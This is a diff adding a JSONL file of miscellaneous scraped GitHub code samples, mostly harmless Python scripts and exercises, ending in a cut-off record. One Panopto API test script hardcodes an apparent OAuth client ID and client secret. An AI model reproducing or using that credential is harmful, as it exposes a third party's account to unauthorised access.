diff --git "a/3073.jsonl" "b/3073.jsonl"
new file mode 100644
--- /dev/null
+++ "b/3073.jsonl"
@@ -0,0 +1,263 @@
+{"seq_id":"22900828070","text":"from absl import app\nfrom absl import flags\nfrom icubam import config\nfrom icubam.db import migrator\nimport click\n\nflags.DEFINE_string(\"config\", config.DEFAULT_CONFIG_PATH, \"Config file.\")\nflags.DEFINE_string(\"dotenv_path\", config.DEFAULT_DOTENV_PATH, \"Config file.\")\nFLAGS = flags.FLAGS\n\n\ndef main(unused_argv):\n cfg = config.Config(FLAGS.config, env_path=FLAGS.dotenv_path)\n mgt = migrator.Migrator(cfg)\n if not click.confirm(\n \"WARNING: THIS WILL UPDATE THE DATABASE IN-PLACE. CONTINUE?\", err=True\n ):\n return\n else:\n mgt.run()\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","repo_name":"icubam/icubam","sub_path":"scripts/migrate_db.py","file_name":"migrate_db.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"98"}
+{"seq_id":"35408190197","text":"\nimport time\nimport uuid\nfrom pprint import pprint\n\nfrom db import DB\n\ndb = DB()\ndb.connect_to_project(\"DB/projects.json\")\n\nclass Project:\n def __init__(self, user_loggedIn) -> None:\n self.user_id = user_loggedIn['user_id']\n\n def create(self):\n self.title = input(\"Title : \")\n while not self.title.isalpha() or not self.title:\n self.title = input(\" Enter valid Title : 😅\") \n self.details = input(\"Details: \")\n while not self.details.isalpha() or not self.details:\n self.details = input(\"Enter valid Details: 😅\")\n self.total_target = input(\"Total target $ : \")\n while self.total_target.isalpha() or not self.total_target:\n self.total_target = input(\"Enter valid Total target $ : 😅\")\n self.start_time = input(\"Start Date (mm/dd/yyyy) : \")\n self.end_time = input(\"End Date (mm/dd/yyyy) : \") \n \n try : \n start_date_format = time.strptime(self.start_time, '%m/%d/%Y')\n end_date_format = time.strptime(self.end_time, '%m/%d/%Y') \n \n if start_date_format and end_date_format:\n \n project_data = {\n \"id\": int(uuid.uuid1()),\n \"title\": self.title,\n \"details\": self.details,\n \"total_target\": self.total_target,\n \"start_time\": self.start_time,\n \"end_time\": self.end_time,\n \"user_id\": self.user_id\n } \n data = db.get_project_data()\n data.append(project_data)\n db.set_project_data(data)\n\n print('\\n\\n Your project is created successfully 👏 \\n')\n else :\n print(\"\\n\\n Your date is invalid , please enter valid date 😅 :\\n\")\n except ValueError:\n print('\\n\\n Invalid Date! 😓 , Enter valid Date\\n')\n\n \n \n\n def view(self):\n data = db.get_project_data()\n if len(data) == 0 :\n print(\"\\n\\nyou don't have project 😱\\n\") \n else:\n for project in data:\n if self.user_id == project[\"user_id\"]:\n print(\"\\n\\n\",project)\n\n\n def edit(self):\n self.view()\n try :\n project_title = input(\"\\n\\n Enter Project Title: \")\n data = db.get_project_data()\n\n if len(data) == 0 and self.user_id != project[\"user_id\"] :\n print(\"\\n\\nyou don't have project 😱\\n\") \n else:\n for index, project in enumerate(data):\n if self.user_id == project[\"user_id\"] and project_title == project['title']:\n while True:\n menu = '''\n ******************** 💻 Edit projects 💻 ************************* \n 1) Edit Title \n 2) Edit Details\n 3) Edit Total Target\n 4) Edit Start Date\n 5) Edit End Date\n 6) Return back to project menu 🏃\n '''\n print(menu)\n try:\n option = int(input('\\n\\n Enter your choice: 🤠 '))\n except:\n ('\\n\\n Invalid Option 😰.')\n\n if option == 1:\n title = input(\"Enter Title: \")\n while not title.isalpha() or not title:\n title = input(\" Enter valid Title : 😅\")\n data[index]['title'] = title\n elif option == 2:\n details = input(\"Enter Details: \")\n while not details.isalpha() or not details:\n details = input(\" Enter valid Details : 😅\")\n data[index]['details'] = details\n elif option == 3:\n total_target = input(\"Enter Total Target: \")\n while total_target.isalpha() or not total_target:\n total_target = input(\"Enter valid Total target $ : 😅\")\n data[index][\"total_target\"] = total_target\n elif option == 4:\n start_time = input(\"Enter Start Date: \")\n try : \n start_date_format = time.strptime(start_time, '%m/%d/%Y') \n if start_date_format :\n data[index][\"start_time\"] = start_time\n else :\n print(\"\\n\\n Your date is invalid , please enter valid date 😅 :\\n\")\n except ValueError:\n print('\\n\\n Invalid Date! 😓 , Enter valid Date\\n')\n elif option == 5 :\n end_time = input(\"Enter End Date: \")\n try : \n start_date_format = time.strptime(end_time, '%m/%d/%Y') \n if start_date_format :\n data[index][\"end_time\"] = end_time\n else :\n print(\"\\n\\n Your date is invalid , please enter valid date 😅 :\\n\")\n except ValueError:\n print('\\n\\n Invalid Date! 😓 , Enter valid Date\\n')\n \n elif option == 6:\n break\n else:\n print('\\n\\n Invalid option 😰 . Please choose a valid one.\\n') \n db.set_project_data(data)\n else:\n print(\"\\n\\n this project name isn't exist 😱 , please try again\")\n except ValueError:\n print('\\n\\n Invalid date ! 😅')\n \n \n \n def delete(self):\n self.view()\n try :\n project_title = input(\"Enter Project Title: \")\n data = db.get_project_data()\n data_original_length = len(data)\n\n for index, project in enumerate(data):\n if self.user_id == project['user_id'] and project_title == project['title']:\n data.pop(index)\n\n if(len(data) != data_original_length):\n db.set_project_data(data)\n print(\"\\n\\n delete project successfully 👏 \\n\")\n else:\n print(\"\\n\\n this project name isn't exist 😱 please try again \\n\")\n except ValueError:\n print('\\n\\n Invalid data ! 😅')\n\n\n \n def search(self):\n self.view()\n data = db.get_project_data()\n if len(data) == 0 :\n print(\"\\n\\nyou don't have project 😱\\n\") \n else:\n date = input(\"\\n\\n Enter Date \")\n\n found = False\n for project in data:\n if (date == project['start_time'] or date == project['end_time']) and self.user_id == project['user_id']:\n found = True\n print(project)\n print(\"\\n\")\n\n if not found:\n print(\"\\n\\n Not Found!😢😢 !! you don't have project with this date 😱 \")\n\n\n \n\n","repo_name":"NermeenShehab/Crowd-Funding-console-app","sub_path":"console_app/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"}
+{"seq_id":"3359210120","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx1 = []\nx2 = []\ny = []\nwith open('./hw1data.dat') as f:\n\tline = f.readline()\n\tlst = line.split(\" \")\n\tdata_size = int(lst[0])\n\tinput_num = int(lst[1])\n\toutput_num = int(lst[2])\n\tfor x in range(data_size):\n\t\tlst = f.readline().split(\"\\t\")\n\t\tx1.append(float(lst[0]))\n\t\tx2.append(float(lst[1]))\n\t\ty.append(float(lst[2]))\n\ncolor= ['red' if l == 1 else 'green' for l in y]\nplt.scatter(x1, x2, color=color)\nplt.show()","repo_name":"alan4chen/NTU_Neural-Network-HW","sub_path":"NN_hw1/Plot_hw1data.py","file_name":"Plot_hw1data.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"8673447686","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom intersections.models import Intersection\nfrom paths.models import Path\nfrom terrains.models import Terrain\n\n# Create your models here.\nclass Board(models.Model):\n id = models.AutoField(primary_key=True)\n\n @classmethod\n def create(cls):\n board = cls()\n board.save()\n for i in range(54):\n Intersection.objects.create(board_id=board.id)\n\n for i in range(70):\n Path.objects.create(board_id=board.id)\n\n for i in range(19):\n Terrain.objects.create(board_id=board.id)\n\n return board\n","repo_name":"evanpthompson/catan-api","sub_path":"catan_api/boards/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"31945102983","text":"import os\nimport click\nfrom flask_babel import _\nfrom time import strftime\nfrom ..app import app, conf\nfrom gdds.app.api.common.db_connection import connect\n\n\n# noinspection SqlDialectInspection,SqlNoDataSourceInspection,PyPep8Naming\n@click.command()\ndef generate():\n \"\"\"Creating Black-List & Pairing-List from Duplication_list Table.\"\"\"\n\n try:\n DOWNLOAD_PATH = conf['GDDS_Lists']\n con = connect()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT imei FROM duplication_list WHERE imei_status IS FALSE \"\"\")\n imei_list = set([l[0] for l in cur.fetchall()])\n\n if imei_list:\n black_list = \"Black-List_\" + strftime(\"%Y-%m-%d_%H-%M-%S\") + '.csv'\n bl_path = os.path.join(DOWNLOAD_PATH, black_list)\n\n with open(bl_path, 'w') as bl:\n bl.write('imei,reason\\n')\n for imei in imei_list:\n bl.write(imei + ',duplicated\\n')\n # bl.write(\",duplicated\\n\".join(imei_list))\n\n bl.close()\n\n pair_list = \"Pair-List_\" + strftime(\"%Y-%m-%d_%H-%M-%S\") + '.csv'\n pl_path = os.path.join(DOWNLOAD_PATH, pair_list)\n\n if conf['pair_list_triplet']: params = \"imei,imsi,msisdn\"\n else: params = \"imei,imsi\"\n\n cur.execute(\"\"\"SELECT {p} FROM duplication_list WHERE imei_status IS TRUE \"\"\".format(p=params))\n pairs = cur.fetchall()\n\n with open(pl_path, 'w') as file:\n file.write(params + '\\n')\n for row in pairs:\n if conf['pair_list_triplet']:\n file.write(row[0] + ',' + row[1] + ',' + row[2] + '\\n')\n else:\n file.write(row[0] + ',' + row[1] + '\\n')\n\n file.close()\n\n print(\"Files successfully created\")\n\n return\n\n except Exception as e:\n app.logger.info(_(\"Error occurred creating Lists.\"))\n app.logger.exception(e)\n","repo_name":"munawwaranwar/Genuine-Device-Detection-Subsystem","sub_path":"src/gdds/cli/generate_lists.py","file_name":"generate_lists.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"10290368958","text":"#!python3\nimport argparse\nfrom UploadAndAuthentificationPanopto_Algo.panopto_oauth2 import PanoptoOAuth2\nimport requests\nimport os\n\ndef parse_argument():\n '''\n Argument definition and handling.\n '''\n parser = argparse.ArgumentParser(description='Upload a single video file to Panopto server')\n #parser.add_argument('--server', dest='server', required=True, help='Server name as FQDN')\n #parser.add_argument('--folder-id', dest='folder_id', required=True, help='ID of target Panopto folder')\n # parser.add_argument('--upload-file', dest='upload_file', required=True, help='File to be uploaded')\n # parser.add_argument('--client-id', dest='client_id', required=True, help='Client ID of OAuth2 client')\n # parser.add_argument('--client-secret', dest='client_secret', required=True, help='Client Secret of OAuth2 client')\n parser.add_argument('--skip-verify', dest='skip_verify', action='store_true', required=False,\n help='Skip SSL certificate verification. (Never apply to the production code)')\n\n return parser.parse_args()\n\n\ndef main():\n '''\n Main method\n '''\n args = parse_argument()\n \n #if args.skip_verify:\n# # This line is needed to suppress annoying warning message.\n# urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n client_id = '5aff5849-cfaa-4176-8a79-af82009b4df3'\n \n client_secret = 'R9d8ao5bM+BjWWpzcANElnVUZz3jP1ixH4OUHOpn5c0='\n\n \n oauth2 = PanoptoOAuth2('test-tu-darmstadt.cloud.panopto.eu', client_id, client_secret, not args.skip_verify)\n \n requests_session = requests.Session()\n access_token = oauth2.get_access_token_authorization_code_grant()\n #Beispiel Anfragen\n # requests_session.headers.update({'Authorization': 'Bearer ' + access_token})\n # response = requests.get('http://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/auth/legacyLogin')\n # response = requests_session.get('https://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/folders/e7a1b480-5ec7-438b-a484-af5f00a442cc/sessions')\n # payload = {'Name': 'AutomatedPlaylist', 'Description': 'Automatisch erstellte Playlist', 'FolderId': 'e7a1b480-5ec7-438b-a484-af5f00a442cc', \n # 'Sessions': ['ae963742-025e-4396-9983-af5f00a44823']\n # }\n # response = requests_session.post('https://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/playlists', json=payload)\n response = requests_session.get(\"https://test-tu-darmstadt.cloud.panopto.eu/Panopto/api/v1/sessions/b8c3f739-71c6-410a-adc7-af8d00bcd41a\")\n print(response.json())\n\n #############################################################\n\n #mainFolderPath = 'C:/Users/Abdulhaq/.spyder-py3/FachbereichsOrdner' \n directory = 'C:/Users/Abdulhaq/.spyder-py3/FachbereichsOrdner'\n for filename in os.listdir(directory):\n f = os.path.join(directory, filename)\n # checking if it is a file\n #if os.path.isdir(f):\n \n \n\n if __name__ == '__main__':\n main()\n \ndef createFolder (file_path):\n print(\"Test\")\n ","repo_name":"AbdiProg/panoptoAutomatedUpload","sub_path":"Testskripte/apiTest.py","file_name":"apiTest.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"73422742401","text":"from flask_wtf import FlaskForm\nfrom wtforms import fields, validators\nfrom .fields import TagListField, TextListField\n\nfrom flask_mongoengine.wtf import model_form\nfrom kampan import models\n\nBaseItemPositionForm = model_form(\n models.ItemPosition,\n FlaskForm,\n exclude=[\n \"created_date\",\n \"updated_date\",\n \"user\",\n ],\n field_args={\n \"warehouse\": {\"label\": \"คลังอุปกรณ์\", \"label_modifier\": lambda w: w.name},\n \"description\": {\"label\": \"คำอธิบาย\"},\n \"rack\": {\"label\": \"ชั้นวาง\"},\n \"row\": {\"label\": \"แถว\"},\n \"locker\": {\"label\": \"ตู้เก็บของ\"},\n },\n)\n\n\nclass ItemPositionForm(BaseItemPositionForm):\n pass\n","repo_name":"r202-coe-psu/kampan","sub_path":"kampan/web/forms/item_positions.py","file_name":"item_positions.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"98"}
+{"seq_id":"28150672419","text":"import unittest\nfrom parameterized import parameterized\n\nimport phototool\n\n\nclass PhotoDuplicates(unittest.TestCase):\n \n @parameterized.expand([\n [[1,2,3,10], [[1,2,3],[10]]]\n ])\n def test_find_duplicates(self, input, exp_output):\n hashes = {k:[None] for k in input}\n exp_groups = {tuple(k):[None]*len(k) for k in exp_output}\n actual_groups = phototool.find_duplicates(hashes)\n self.assertDictEqual(exp_groups, actual_groups)\n \n @parameterized.expand([\n [[1,2,3],[[0,1,2],[1,0,1],[2,1,0]]]\n ])\n def test_compute_hamming_distance(self, input, exp_output):\n actual = phototool.compute_hamming_distance(input)\n self.assertEqual(exp_output, actual)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"nikulabs/photo-duplicates","sub_path":"tests/test_photoduplicates.py","file_name":"test_photoduplicates.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"21758863893","text":"# Allissa\n# Hertz\n# Oct. 6\n# Description: Lab 6. Caeser cipher\n\ndef main():\n\n word_to_cipher = input(\"Input a word to cipher: \")\n number_for_cipher = input(\"Input a number: \")\n\n # create an empty list for the ciphered and deciphered letters\n ciphered_word = []\n deciphered_word = []\n \n # loop through the word the user put in\n for ch in word_to_cipher:\n # find the ord value of each character, add the number the user put in and turn it\n # back into a character\n c = chr(ord(ch) + int(number_for_cipher))\n # find the ord value of each character, subtract the number the user put in and turn it\n # back into a character\n d = chr(ord(c) - int(number_for_cipher))\n # add each ciphered/deciphered character to the empty list\n ciphered_word.append(c)\n deciphered_word.append(d)\n\n # Print \"The encode/decode message is\" along with all the letters in the ciphered/deciphered\n # list joined together with no characters/spaces\n print(\"The encoded message is:\", \"\".join(ciphered_word))\n print(\"The decoded message is:\", \"\".join(deciphered_word))\n\nmain()\n","repo_name":"simplyallissa/Python","sub_path":"HertzAllissaLab06b.py","file_name":"HertzAllissaLab06b.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"42808729856","text":"import os\nfrom pathlib import Path\nimport platform\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QWidget, QGridLayout, QMainWindow, QApplication, QLabel, QLineEdit, QTextEdit, QPushButton\n\nfrom src.util.zviutil import getResource\nfrom src.constants.zviconstants import constants\n\n\nclass ZVIReportBug(QMainWindow):\n def __init__(self, emailManager, parent=None):\n super().__init__(parent)\n self.emailManager = emailManager\n self.build()\n\n def build(self):\n widget = QWidget()\n layout = QGridLayout(widget)\n uLabel = QLabel(\"Username:\")\n uLabel.setMaximumWidth(70)\n layout.addWidget(uLabel, 0, 0, 1, 1)\n self.username = QLineEdit()\n self.username.setMaximumWidth(150)\n self.username.setDisabled(True)\n layout.addWidget(self.username, 0, 1, 1, 2)\n sLabel = QLabel(\"System:\")\n sLabel.setMaximumWidth(70)\n layout.addWidget(sLabel, 1, 0, 1, 1)\n system = QLineEdit()\n system.setMaximumWidth(150)\n self.systemName = platform.system() + \" \" + platform.version()\n system.setText(self.systemName)\n system.setDisabled(True)\n layout.addWidget(system, 1, 1, 1, 2)\n layout.addWidget(QLabel(\"Description:\"), 2, 0, 1, 1)\n self.bugDescription = QTextEdit()\n layout.addWidget(self.bugDescription, 3, 0, 1, 3)\n self.submit = QPushButton(\"Submit\")\n self.submit.clicked.connect(self.submitBug)\n layout.addWidget(self.submit, 4, 0, 1, 3)\n self.setCentralWidget(widget)\n self.setWindowIcon(QIcon(getResource(\"report-bug.ico\")))\n self.setWindowTitle(\"Report Bug\")\n self.setObjectName(\"Report A Bug\")\n self.setMinimumSize(300, 200)\n self.resize(300, 200)\n\n def setUsername(self, username):\n self.username.setText(username)\n\n def submitBug(self):\n self.emailManager.sendEmail(\"drees@zahroofvalves.com\",\n \"ZVIApp Report Bug - User: {0}, {1}\".format(self.username.text(), self.systemName),\n self.bugDescription.toPlainText(),\n os.path.join(constants.path[\"Local\"], Path(constants.logger.handlers[0].baseFilename).name))\n self.bugDescription.clear()\n self.close()\n\n def closeEvent(self, event):\n self.bugDescription.clear()\n event.accept()\n\nif __name__ == \"__main__\":\n import sys\n\n app = QApplication(sys.argv)\n w = ZVIReportBug(None)\n w.show()\n sys.exit(app.exec_())","repo_name":"David52920/zviapp","sub_path":"src/common/windows/report/zvireportbug.py","file_name":"zvireportbug.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"4113168623","text":"# Evalute the value fo arithmetic expression in reverse polish notation.\r\n# ex : [2,1,+,3,*] = 9\r\ndef evalute_expression(arr):\r\n length = len(arr) # store the length of the array\r\n stack = [] # stack to store the operands\r\n operators = ['+','-','*','/']\r\n # traverse the arr\r\n for i in range(0,len(arr)):\r\n cur_ele = arr[i]\r\n # if the current element is operator , and we will evalute using the top two element in the stack\r\n if cur_ele in operators:\r\n value1 = stack.pop()\r\n value2 = stack.pop()\r\n value1 = int(value1)\r\n value2 = int(value2)\r\n if cur_ele == '+':\r\n stack.append(value1 + value2)\r\n elif cur_ele == '-':\r\n stack.append(value1 - value2)\r\n elif cur_ele == '*':\r\n stack.append(value1 * value2)\r\n elif cur_ele == '/':\r\n stack.append(value1 // value2)\r\n else: # if the current element is operand\r\n stack.append(cur_ele)\r\n return stack[-1]\r\n\r\n# test case\r\narr = ['2','1','+','3','*']\r\nans = evalute_expression(arr)\r\nprint(ans)","repo_name":"Ranjit007ai/InterviewBit-Stack_and_queue","sub_path":"stack_and_queues/evalute_expression/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"25472392711","text":"import requests\nimport json\nimport ast\nimport datetime\nfrom datetime import timedelta\n\n#Give token\ntoken = \"Your given token\"\n\n#Empty string\ndatestamp = \"\"\n\ndata = { 'token' : token , 'datestamp' : datestamp}\nreq = requests.post(\"http://challenge.code2040.org/api/dating\", json = data)\n\nnewreq = req.json()\n\n#Took the two different key in the json dict into different variables\ninterval = newreq['interval']\ndatestamp = newreq['datestamp']\n\nprint(datestamp)\n\n#Made datestamp(a string data type) into datetime data type\ndatestamp = datetime.datetime.strptime(datestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n\n#Made interval into datetime data type and added it to datestamp\ninter = datetime.timedelta(seconds = interval) + datestamp\ninter = inter.isoformat() + 'Z' #added missing Z to the iso8601 format\n\nprint(inter)\n\ndata['datestamp'] = inter\n\nreq = requests.post(\"http://challenge.code2040.org/api/dating/validate\",json = data)\nprint(req.content)\n","repo_name":"Sandra-Flores/Code2040","sub_path":"dating.py","file_name":"dating.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"34710248180","text":"import pygame\n\nfrom configuraciones import Configuraciones\n\nimport funciones_juego as fj\n\nfrom asesino_protagonista import Asesino\n\nfrom plataforma_tierra import Plataforma_de_tierra\n\nfrom pantalla import Pantalla\n\nfrom proyectil_asesino import Proyectil_asesino\n\ndef run_game():\n \"\"\"Inicia el juego y crea un objeto pantalla\"\"\"\n\n pygame.init()\n configs = Configuraciones()\n pantalla = pygame.display.set_mode((configs.pantalla_ancho, configs.pantalla_alto))\n pygame.display.set_caption(\"Juego1\")\n pantalla_fondo = Pantalla()\n clock = pygame.time.Clock()\n\n # Crea al personaje asesino\n plataforma1 = Plataforma_de_tierra(pantalla, 130, 350)\n plataforma2 = Plataforma_de_tierra(pantalla, 300, 700)\n plataforma3 = Plataforma_de_tierra(pantalla, 400, 650)\n asesino = Asesino(configs, pantalla, plataforma1, plataforma2, plataforma3)\n\n # Crea un grupo para almacenar las plataformas\n Plataformas = (plataforma1, plataforma2, plataforma3)\n\n while True:\n fj.verificar_eventos(asesino, plataforma1, plataforma2, plataforma3, pantalla_fondo)\n fj.pantalla_inicial(pantalla)\n if pantalla_fondo.cambio_fondo == True:\n while True:\n fj.verificar_eventos(asesino, plataforma1, plataforma2, plataforma3, pantalla_fondo)\n asesino.update()\n fj.actualizar_pantalla(pantalla, asesino, plataforma1, plataforma2, plataforma3)\n clock.tick(10)\n print(asesino.direccion_asesino)\n\nrun_game()\n","repo_name":"lobo23j/mi_juego1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"10438440079","text":"import json\nimport logging\nimport requests\nfrom typing import Any, Dict\nfrom os import environ\n\nimport boto3\nfrom bs4 import BeautifulSoup\n\nLOG_LEVEL = int(environ['LOG_LEVEL'])\nQUERY_WIKIDATA_LAMBDA = environ['QUERY_WIKIDATA_LAMBDA']\n\nlogging.basicConfig()\nlogger = logging.getLogger('extract_wikipedia_link')\nlogger.setLevel(LOG_LEVEL)\n\nclient = boto3.client('lambda')\n\n\ndef handler(event: Dict[str, Any], _):\n try:\n url = event['wikipedia_link']\n author = event['author']\n book_id = event['book_id']\n logger.info(f'Scraping wikidata ID for URL {url}.')\n page = requests.get(url)\n soup = BeautifulSoup(page.content, \"html.parser\")\n wikidata_item = soup.find(id='t-wikibase').find('a', href=True)\n wikidata_id = str(wikidata_item['href']).split('/')[-1]\n logger.info(f'Found ID: {wikidata_id}.')\n\n client.invoke(\n FunctionName=QUERY_WIKIDATA_LAMBDA,\n InvocationType='Event',\n Payload=json.dumps({\n 'wikidata_id': wikidata_id,\n 'wikipedia_link': url,\n 'book_id': book_id,\n 'author': author,\n }),\n )\n\n return {'statusCode': 200, 'body': json.dumps({'wikidata_id': wikidata_id})}\n except KeyError as ex:\n logger.error(ex)\n return {'statusCode': 400, 'error': str(ex)}\n except Exception as ex:\n logger.error(ex)\n return {'statusCode': 500, 'error': str(ex)}\n","repo_name":"askamander/TASS_project","sub_path":"scrapers/lambda/wikipedia_scraper/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"24259627725","text":"from flask.ext.principal import RoleNeed, UserNeed\nfrom flask.ext.login import UserMixin, current_user\nfrom werkzeug.utils import cached_property\n\nclass UserAuth(UserMixin):\n\n USER = 50\n ADMIN = 100\n MANAGER = 200\n ROOT = 300\n\n def 
__init__(self, result):\n if not result:\n return None\n self.id = result['id']\n self.username = result['username']\n self.password = result['password']\n self.displayname = result['displayname']\n self.email = result['email']\n self.organisation_id = result['organisation_id']\n self.organisation_name = result['organisation_name']\n self.organisation_domain = result['organisation_domain']\n self.role = result['role']\n self.active = result['active']\n self.language = result['language']\n self.created_time = result['created_time']\n self.backend = result['backend']\n\n def from_identity(self, identity):\n if identity.id == current_user.id:\n identity.provides.update(self.provides)\n identity.user = current_user\n identity.auth_type = self.backend\n else:\n identity.auth_type = \"\"\n\n @cached_property\n def provides(self):\n needs = [RoleNeed('authenticated'), UserNeed(current_user.id)]\n\n if self.is_user:\n needs.append(RoleNeed('user'))\n\n if self.is_admin:\n needs.append(RoleNeed('admin'))\n\n if self.is_manager:\n needs.append(RoleNeed('manager'))\n\n if self.is_root:\n needs.append(RoleNeed('root'))\n\n return needs\n\n @property\n def is_user(self):\n return self.role == self.USER\n\n @property\n def is_admin(self):\n return self.role == self.ADMIN\n\n @property\n def is_manager(self):\n return self.role == self.MANAGER\n\n @property\n def is_root(self):\n return self.role == self.ROOT\n\n def __repr__(self):\n return \"<%d : %s (%s)>\" % (self.id, self.username, self.email)\n","repo_name":"sboily/xivo-unified","sub_path":"app/core/authentification/modules/auth_base.py","file_name":"auth_base.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"72586804162","text":"import os\nimport shutil\nimport time\nimport re\n\n\ndef backup(backup_count: int, backup_dir: str, source_file: str) -> None:\n\n # Setup\n database = os.path.basename(source_file)\n filename, ext = os.path.splitext(database)\n\n # Copy file with timestamp\n now = time.time()\n timestamp_name = f\"{filename}-{str(int(now))}{ext}\"\n shutil.copy(source_file, backup_dir)\n os.rename(os.path.join(backup_dir, database), os.path.join(backup_dir, timestamp_name))\n\n # Remove old backups\n regex_str = r\"{}-\\d*{}\".format(filename, ext)\n backup_files = [name for name in os.listdir(backup_dir) if re.search(regex_str, name)] \n\n for i in range(len(backup_files) - backup_count):\n os.remove(os.path.join(backup_dir, backup_files[i]))\n","repo_name":"EdvinAlvarado/File-Backup","sub_path":"python-backup/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"14376008255","text":"class Solution:\n def backtracking(self, tickets, path, t_dict):\n if len(path) == len(tickets) + 1:\n return True\n start = path[-1]\n t_dict[start].sort()\n for _ in t_dict[start]:\n t = t_dict[start].pop(0)\n path.append(t)\n if self.backtracking(tickets, path, t_dict):\n return True\n path.pop()\n t_dict[start].append(t)\n\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n path = ['JFK']\n t_dict = defaultdict(list)\n for t in tickets:\n t_dict[t[0]].append(t[1])\n self.backtracking(tickets, path, t_dict)\n return path","repo_name":"1asso/LeetCode","sub_path":"0332. Reconstruct Itinerary.py","file_name":"0332. 
Reconstruct Itinerary.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"24077910201","text":"import sys\nfrom collections import deque\n\nm, n = map(int, sys.stdin.readline().split())\nbox=[]\ndx=[-1,1,0,0]\ndy=[0,0,-1,1]\nfor _ in range(n):\n t=list(map(int, sys.stdin.readline().split()))\n box.append(t)\nresult=0\nqueue=deque()\n# 좌표들을 queue에 넣어줌\nfor i in range(n):\n for j in range(m):\n if box[i][j]==1:\n queue.append([i,j])\n\ndef bfs():\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx, ny = x+dx[i], y+dy[i]\n # 영역안에 있고, 그 좌표에 토마토가 익지않은 상태로 있는 경우에 +1해주기\n if 0<= nx< n and 0<=ny their weightedIntersection IFBucket.\"\n L = [(x, wx) for (x, wx) in L if x is not None]\n if len(L) < 2:\n return _trivial(L, family)\n # Intersect with smallest first. We expect the input maps to be\n # IFBuckets, so it doesn't hurt to get their lengths repeatedly\n # (len(Bucket) is fast; len(BTree) is slow).\n L = sorted(L, key=lambda x: len(x[0]))\n (x, wx), (y, wy) = L[:2]\n dummy, result = family.IF.weightedIntersection(x, y, wx, wy)\n for x, wx in L[2:]:\n dummy, result = family.IF.weightedIntersection(result, x, 1, wx)\n return result\n\ndef mass_weightedUnion(L, family=BTrees.family64):\n \"A list of (mapping, weight) pairs -> their weightedUnion IFBucket.\"\n if len(L) < 2:\n return _trivial(L, family)\n # Balance unions as closely as possible, smallest to largest.\n merge = NBest(len(L))\n for x, weight in L:\n merge.add((x, weight), len(x))\n while len(merge) > 1:\n # Merge the two smallest so far, and add back to the queue.\n (x, wx), dummy = merge.pop_smallest()\n (y, wy), dummy = merge.pop_smallest()\n dummy, z = family.IF.weightedUnion(x, y, wx, wy)\n merge.add((z, 1), len(z))\n (result, weight), dummy = merge.pop_smallest()\n return result\n\ndef _trivial(L, family):\n # L is empty or has only one (mapping, weight) pair. 
